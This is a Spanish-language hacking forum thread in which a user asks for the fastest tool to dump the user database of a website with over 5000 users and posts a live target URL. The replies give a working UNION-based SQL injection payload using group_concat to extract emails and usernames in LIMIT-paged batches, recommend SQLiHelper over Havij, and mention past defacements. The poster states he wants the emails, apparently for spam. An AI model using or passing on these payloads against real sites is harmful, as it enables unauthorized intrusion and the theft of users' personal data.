Buenas parecera estupido esto ya lo he hecho ya he quemado esta etapa pero no aguanto las ganas de juakear una website con mas de 5000 usuarios contando con el administrador estaba utilizando havij pero parce es muy lento nesecito una tools buena que me saque la informacion rapido no se si sqlmap no se diganme la mejor tools para estos casos de mucha informacion thanks : D....
Edit:
bueno aqui dejo una website para que se diviertan
http://www.divxtotal.com/download.php?id=1
pero no es la de mas de 5000 xd
Si ya lo hiciste, tonces recuerda como comenzaste :)
Saludos
Como Dice Snifer ... solo queda recordar ;)
esto es como montar en bici.... nunca se olvida solo es practicar de nuevo :D
Me Imagino que si usas Havij o algunas otras tools ... es porque ya sabes como funciona manualmente no ? ;)
Salu2
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Como Dice Snifer ... solo queda recordar ;)
esto es como montar en bici.... nunca se olvida solo es practicar de nuevo :D
Me Imagino que si usas Havij o algunas otras tools ... es porque ya sabes como funciona manualmente no ? ;)
Salu2
Como lo menciona el te completo el tip, a mano quizá sea un poco mas rapido, Havij te ayudaria buscando los string o los interger, una vez que los encuentras solo es cuestion de inyectar el code, mira te explico una función:
CitarEn MySQL, cuando queremos limitar el rango de registros devueltos por una sentencia SELECT tenemos la opción de utilizar LIMIT:1 Select * FROM tabla LIMIT 10,5
Esta sentencia nos permite devolver 5 registros a partir del décimo. El ejemplo sería aplicable por ejemplo a un listado paginado con 5 registros por página y estuviésemos mostrando la tercera de ellas.
Fuente (http://www.vicentesabuco.com/sql-server/2010-01-16/limit-sql-mysql-solucion.html)
Entonces nuestra inyección quedaria asi
http://chicasextremadamentehermosasenmicasa.com/index.php?todasparami=-1+union+select+1,2,group_concat(email,0x3a,usuario),4+from+chicas_users+limit+1,30--Despues modificas el limit
Citar+limit+30,60--
y asi sucesivamente :) espero y me comprendas, no hay que dejarle todo a las tools, tambien usar la cabeza.
En mis defaces, siempre he buscado el admin, no me imagino para que fines quieres los correos si no mas que para spam
¿Podrias ser tan amable de explicarme para que los necesitas?Si no me entendiste me dices donde te atoraste :)
Buenas noches
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Como Dice Snifer ... solo queda recordar ;)
esto es como montar en bici.... nunca se olvida solo es practicar de nuevo :D
Me Imagino que si usas Havij o algunas otras tools ... es porque ya sabes como funciona manualmente no ? ;)
Salu2
Como lo menciona el te completo el tip, a mano quizá sea un poco mas rapido, Havij te ayudaria buscando los string o los interger, una vez que los encuentras solo es cuestion de inyectar el code, mira te explico una función:
CitarEn MySQL, cuando queremos limitar el rango de registros devueltos por una sentencia SELECT tenemos la opción de utilizar LIMIT:1 Select * FROM tabla LIMIT 10,5
Esta sentencia nos permite devolver 5 registros a partir del décimo. El ejemplo sería aplicable por ejemplo a un listado paginado con 5 registros por página y estuviésemos mostrando la tercera de ellas.
Fuente (http://www.vicentesabuco.com/sql-server/2010-01-16/limit-sql-mysql-solucion.html)
Entonces nuestra inyección quedaria asi
http://chicasextremadamentehermosasenmicasa.com/index.php?todasparami=-1+union+select+1,2,group_concat(email,0x3a,usuario),4+from+chicas_users+limit+1,30--
Despues modificas el limit
Citar+limit+30,60--
y asi sucesivamente :) espero y me comprendas, no hay que dejarle todo a las tools, tambien usar la cabeza.
En mis defaces, siempre he buscado el admin, no me imagino para que fines quieres los correos si no mas que para spam
¿Podrias ser tan amable de explicarme para que los necesitas?
Si no me entendiste me dices donde te atoraste :)
Buenas noches
+10 , Si es grande (5000) no lo gozaras usando tools , dale a mano y te sentiras mejor.
No te digo que no uses automatizadores , pero dejaselo a cuando tengas prisa y la web sea una birria.
Café y tiempo es la situación ideal para ponerte a hacerlo manual.
Mira, lo mejor seria que lo hicieras manual al ataque, pero si queres hacerlo con alguna tools que sea diferente a havij, te recomiendo el SQLiHelper, es bastante bueno....
no yo solo quiero los correos jeje a mi me vale huevo rootear y defacear na que pereza no le veo etica ya a eso y registrarlo en un zone-h pues miren quiero sacar grandes como este que lo tengo guardado en mi nube xD hay los comparto.
gracias ;)
Edit: Quito los links de descarga.